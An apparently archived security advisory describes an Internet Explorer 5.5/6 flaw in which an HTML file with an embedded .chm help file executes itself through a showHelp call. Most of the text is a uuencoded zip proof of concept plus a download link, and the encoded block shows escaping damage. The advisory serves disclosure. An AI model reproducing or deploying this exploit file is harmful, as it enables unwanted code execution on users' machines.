COMMAND

	Internet explorer html file self execution

SYSTEMS AFFECTED

	 IE5.5 and IE6

	 Tested on w98 and w2000

PROBLEM

	http-equiv from [http://www.malware.com] found a funny bug  in  Internet
	Explorer:
	

	The following file is an html  file  comprising  both  scripting  and  a
	complied help file [*.chm].
	

	We inject scripting into the actual  help  file  which  is  designed  to
	point back to the html file and execute it. Provided the html file  name
	contains the \'word\' chm in it, Internet Explorer 5.5 and 6.0  executes
	it.
	

	Because it is an html file  proper,  Internet  Explorer  opens  it.  The
	scripting inside is then parsed and fired. That  scripting  is  pointing
	back to the  same  file  with  a  showHelp  call  and  because  that  is
	precisely what it is, it executes !
	

	Tested on win98 IE5.5 and IE6. Constructed for win98:
	

	[harmless   *.exe   -    requires    positioning    of    Mshta.exe    @
	C:\\WINDOWS\\SYSTEM]
	

	 File

	 ====

	

	Download from http://www.malware.com/html.zip or uudecode this :
	

	

	begin 777 html.zip

	M4$L#!!0  @ (  ]BORRH^J[)I P  \' S   2    ;6%L=V%R92YC:&U;,ETN

	M:\'1M[5EY/%3K&W^\'N!+A(Y5*A*1N8\\8L9D:VT$*VS$BA9<QR&Y<9S0P2BE*W

	MDH0L*47U4VC10M:ZE&XJ2W$M;:K;0D*XZ4KXS9PS_>9$MWOKMWQ^?\\QW/N<]

	M[WF?Y_T^S_L\\SWG/<3C0J(OE 0#K1 =*=,S3;%LY?AP ZD.H\\)RP.HW#*B\"C

	M2O_%:XU1UV)],:9*SALE9YHZ?+XM.0^CX\'/,7/ )\'&A4-[&()CJ4Q0,B?3F)

	M#R,B?-03]\\5C8I_\\$N16F\\RJTT@?@\'V@2>0?X>:\\Q,E,53H/FHL172AA#!SL

	M5RZU=T>E&6= 5S1;D0-B6HP!E>;NX+*$BBKVFBR24%=1:8N<091B)D5T17-U

	M<[ 3B8S511<>[DXB752Q_63X@F;KA\"HFJX@H/!U<[%T]J:AM6E%.$S\"&BQW8

	M0HXSG<-%B0T8NMHZ.KA0::AH3I*U%L;0TW.A0,!C<.A\"3C#+B</]42!V4>>S

	M C<^+Y#%%X:BHEGC-,0:RUBA(3P^\\U_3M,<,2J?0QZEB NC^(70^RV2],, ?

	M!;9I33(WMZ<+Z=1 .H.%<:$\'B.P(A !8&\"/\'J4(>G_X#\"^-,M>,%!/)9 @&+

	MB;\'C<84LKA <M=[K-O]O:?-Y_F(MX#=C[E_JBT1<!RZ;!WR5,\'^I3./3N0(V

	MCQ^ @;RW,%K[%5/\"2(OM<&0* 8NFV.--T::F]J*>+8Z$QF(78NTHIHLH=B2[

	M\"(P#5R\"D<QDL,:\\XT)S_L@EWEH EI-%]_5G@G!H6R\"\"###+(((,,,L@@@PPR

	MR# &YU%#(!(L %/ 3\" \'5( \'X (&X($ $ CX@ 4$HA\\+,$6:*L 94(\'=9V5A

	M@ 06BV0X0 840 !8@!:=[0$>F(IZIJ*?O6@L4 >VJ2@ZG+Q6VHF_6\'P\\)!\\Z

	M@#ST16,<.#?H:S$>3 9+ER[46\\\'B\"S@\\KA[!A$0P(9.P.)\'<$/JF,1KK,$/!

	MAGGE\'\\E$S*H ^4>\\B\'X&\" D),?DXR. %Z*\'1>CBL\"=;41$2L*#(Y6BX6XH \"

	M4/I()0H%;%L5 \'6: =6Y<H,EM #4-R8!):M#&62000899)!!!AEDD$$&&63X

	MOX::Y%N DMXX$-0 ZN3!;\'V@ ,\"P:W=$-$7.J<\"@K-S_V$/%ENRIF177,E\\?

	MT#19PK/;S<]0-CP;V;GB87(R)RW)JS!6[JA/X=;=2O7%W_]ZNLPEQSOWY(PD

	MO=T [&37U\"B!R^6DT)&^D<NWN:U]&\"=\\5,I&G\'I6X!,_Y<3 A&:CIQ5&3A..

	M4=U/$DJ9+<H7.,J8[2GJ9.8CJZ@(95 N]DY/6ULN\\*>IE>?\'[2 <2FWJ\'C:B

	M#X=VI/57WBKS\"_8^G1<>&23T\"I)[-ZUXY_3 _+J1*8V65D64,Y<*<BE6UE?(

	M9I9DJ_>GSC][UMI\\Z[I66?NJ#54GT_+W6/IWJ#ULU9ZQ!1T9T=I9UQ1B^:HS

	MHOKGQJY7J@6:0JW.S/0,O84IQ,O=:)LI(RV][N-\'RI1K[N66M3;4>A:N\"&_1

	M->S1EWOF/)S;U:H^LWQ3\\_N6LN+Q_5NN<E5C?MU+;\"E1ZR=-QA^,K[[Z(L1[

	MP870WA>;[C=UV$U<:[_V1>.6MH*%\"1,Z]JW-7./]H&TS-SIZ:!,//SE[)/_%

	M<L$FNYU),:=7153\\\\;KKX5-[9XM[SU>7UYTM6H.N.=VIV:7UKK8T\\\\S]L()6

	MFQ++GRW?>7J.-&XQ.Z\'KZJAC5S\\04NIY]\'3%A_2N8F[\"W>S,M(.T)X$S\'\\QI

	M(\"4WO!]>34C*P38?)M57S#D6_N%QSB^;GV%^J*J+#MZ84GEU\"_=EA%_J%H\\W

	MP6E\'?\"L3LSD9NL<9@UT-V>Q,U_#WZ&H;Q0/U+;KQRQ7:XOSEAJW/SYV?\\7*2

	ME?P T^VB4/X KM;/W,;H=5_:WIQX<X_?4VT4S3ZX+F\':VJNUW[C=%K9U^\'ZO

	MR_$2_!$WYYDWXI,\\ZK_#X9YN-M\\W5]NZ/OYV3WN4S@&*I?6^^%FQ0QN\\QK]R

	MZ5UNN7?:$;1-WMW\"J(HY?/(MAT:UON\\=S+.S$NV+ZE42FQ?EYAN&]P[6)S;J

	MOEQT*\':_ZP]OFX[<:2*;5<0=4<K8_,!:2*6WA3Z9&$7=5*EY8G/<J9Q=&_H\\

	M3&LNW[P>Y;\'\\-Q_:Y@W/YE60!4E/?PJ*\'W94K\"]W41F?+[A8O:[\'4EUGU<%G

	MYHYAFM<.M57Y\'FD*;LVY^<I\'WB_;Y>*K!_2P>=C@W(NOPRU5+IFWW*O<_M;[

	M:J\"GS]!]50/OI/J1<FQD;NH9OX#=@SMZUBYJ%@2F/IYG$&8Z4=-G1Y$/BZV;

	M1E?RI+_)?9C;->U%3<*K;J^IMLDJS4\'$VGW3C\"I[-?O]U6K/8WU/52SH5K5C

	MENVQ-+QZY[S3V]ED]A\'ZC56II_J/9[7IGW*](;R=4!6=G\\BR+5T_5,LKNGPQ

	MSH\"0YU:T=-.UY;/FWEVH+$R<Z):1+MPFUW9<9Y+-G/8,!7.\'[XSK7,P71@GO

	M3E3.2!2ZR:4?WS:I37%.@>O5J#+-I^16APTSNJ-Q-8/7M\'_RXEL\'3.Q()M!R

	M$[L;JT\\T[:U/MF\'?FK\' ^)> 9<LO,4XNPY4$Q1ND,P*.K;@LI.TTO+MS9?NN

	M=DW-5,==[,+ (#^4==RRRQA]SL6CVN:QQ2OUSY2&T(K&%?GPY=.7W:VU)^W9

	MTW=H^JZ!Z5PM816[V.E\"MY;.KH,Z>=4G5_:<P_?-G2_WEOOP4)\'<K9B&6;,N

	M1ZS/N]5F8\' KY43>,H^28#R[?7Q(S&!)6M3&F\'6EUH&X>WNIB0IW$O>OO[4_

	ME36Y*+1/<.@5FO1V[9N^-3T#R:?2/\'HWS?R#I\'A]VMJ\"Z.*8IGWOMJ9@6E73

	M4 IH.G8&O7GR^<U#[YZC\"T:&W6U]^N45WUR]TER>@F4?6Q1W=L]OX7,G8.)T

	M)S*TO;\"F[9:NX><T8L\\5GM2:KZI>6#K30MAA?-VI</ILPN*(*S=2*Z=$]\"3$

	M3C%9, $=UC#-><V5-ZE1L_]X<O5YF\\8,7KCS=$:6R78-@T>EUTPUISS?-3_X

	M5&&\\I^DS=\"I?!Z6=\\DMHK)\'\\&I^[& 4\\XSI^3O+VE.2LE)1P9M6Y$V7%B5ZG

	MIQUV=W7),JHWIW+R;U[QHM\\<Z*TO_LTQN)-3O$/%^U*\\I7?!\"7+:$VK:J=F!

	MC6&X/3K4_C.K68_?!^\'>JMXG;E_3Y1>GPBFH/\'ZOOJ:2LP\"?@#Y]H/KP(R=C

	M*C^+^_!\"OTG&@I##]K6\'#[LG9776?NB_3>V\\5T<K\"%A_LS^@<^#[*8ZYFRXV

	M$ 8C9J\\>&8[OVO6/Q[N.<B;I/ZA7-M\'WVW_T0<,\\[E&_H:?L9L=LOUK/+N+L

	M^/@?=X=PB<1S=W[,2>DR6]2CX?_J&*-E/W>U?X[ALUESZBR.Q^[>XWWP85F^

	M\\^M[C[(V]O10JQP*LQ,2/OC6.%->4@^A@T[,#TW/+MU?0MW_J,?Q+(:7\'S)@

	M457S;@4IK+,]K)]D>>9Y6D3[D<Q93XZR=-\\8%6E7KXPS<AK>&C/5<4M%7<?O

	M?4L29^=FE^2EJ[T=-@GV\'&D?W/@X>J\"OU0-$?GSZW7Z7J5\"^([_>-_*26_A(

	M1US&8Y\\MQ;KC7OX[S]06(/VG@)+H,!8=\'_]YX/:=1\"GRTSD6XN_[5A8\"!I\\3

	M*+1B\\AA! 2RNT\"2$SQ&RC/5]@K!8/$/<$O\'BE@\"U1!S4IT!]+-02($V6N#4S

	M$[<D(M2\'1Z!9)$C\'#)IEQI9*<1\"#&1-J3:$6LD@B24=(D$4SB!-\'AEJ(A^0+

	MM1 _\'F8@(/CQ\"$^84@;8+NP/#NH3B8AU0=;Q,#,6X0/,3);:@NW\"#\"2D+1QB

	MA\"#U7^(Y-!</,>,8HWG@M4LL(AC@:$OB29\"NA01Q$MC2R$NL0!:)#&D+C\\!Q

	M@]N_M49D\'HE2K^#82F9A1V?GSSB1=K\\M4W!52.J!@N!\'U@9)6K<$,VE\\)/EE

	M(JJ.A:@ZA%UX[7#$OJ(R<5)F@BGB?D%D$/:$P!ICA8[@-!M= Y+X(%>-E:X=

	M3T=X-;9.V%(ILE;AC\"\"E!#(B\\@RI%3BJWY8ON\"8E5A#QA\'T@^DKO!2(3,0OA

	M@]D7K7R9!QE)R8J(B\'Q1I/&\']RZX<O[W5?IG48*]DN@@,BO)/A%A%U$/),KH

	MN_*32B,CV BC]Q/)GHRH9 DS\'K$6^N>9\\03$SH;[_-X.[U>?9!;...GS^X^$

	MF?QYYB_G%\\D@R>P7=SQ8\"FLB=\\ZOV $0SSM)G)F(^L2-J7,RP@?FZ&J$\\XYC

	M_W6%C*U;2;X0%4)$/G^1U<L>4TN(^OS&N_XK(S;VZ2EAH(SQBH)8+T,:5;@V

	MD.TGT6#^1R.#^_8W%DDUPIY#FGCBESQ\'UL#?>P?3GVN!D;S.66\"@MSNK?P)0

	M2P$\"%  4  ( \"  /8K\\LJ/JNR:0,  !P,P  $@           \"  MH$     

	H;6%L=V%R92YC:&U;,ETN:\'1M4$L%!@     !  $ 0    -0,        

	 

	end

	

SOLUTION

	Nothing yet.